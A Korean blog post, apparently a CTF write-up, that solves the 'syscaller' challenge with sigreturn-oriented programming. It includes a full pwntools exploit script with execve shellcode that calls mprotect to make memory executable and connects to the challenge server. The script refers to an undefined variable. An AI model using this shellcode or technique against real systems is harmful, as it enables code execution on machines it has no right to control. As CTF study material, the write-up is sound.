SMALL
SROP 기본 문제이다.
보안 기법은 모두 꺼져있다.
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
text 영역에 rwx권한을 주고 다시 입력을 받게한다.
그리고 입력 받는 주소를 텍스트 영역에 가게하고 텍스트 영역을 쉘코드로 덮는다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 | #!/usr/bin/env python from pwn import * import binascii import time context(log_level='debug',arch="amd64") RAND_IMG_BASE = False remote_flag = True if remote_flag == False: s = process("/home/jhong/Desktop/syscaller") else: #chal1.swampctf.com 1999 debug = False s = remote("chal1.swampctf.com",1800) binary = ELF("syscaller") target = 0x400000 shell3 = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05" frame = SigreturnFrame(kernel="amd64") # CREATING A SIGRETURN FRAME frame.rax = 10 # SET RAX TO MPROTECT SYSCALL NUMBER frame.rdi = target # SET RDI TO TEST ADDRESS frame.rsi = 2000 # SET RSI TO SIZE frame.rdx = 7 # SET RDX => RWX PERMISSION frame.rsp = target+0x120 frame.rip = 0x400104 # SET RIP TO SYSCALL ADDRESS payload = "" payload += p64(15) payload += p64(15) payload += p64(15) payload += p64(15) payload += p64(15) payload += p64(15) payload += p64(15) payload += p64(15) payload = payload + str(frame) payload = payload +"\x90" * (0x200 - len(payload) - len(shell3))+shell3 payload2 = "\x90"*(0x200- len(shell2))+shell2 s.sendafter("Hello and welcome to the Labyrinthe. Make your way or perish.\x0a",payload) time.sleep(10) s.send(payload2) s.interactive() | cs |
LIST
'Exploit' 카테고리의 다른 글
| cmd injection (0) | 2018.04.15 |
|---|---|
| afl 설치 및 사용 (0) | 2018.04.01 |
| House of force (0) | 2018.02.28 |
| shellcode extract (0) | 2017.09.07 |
| libc-database 정리 (0) | 2017.07.18 |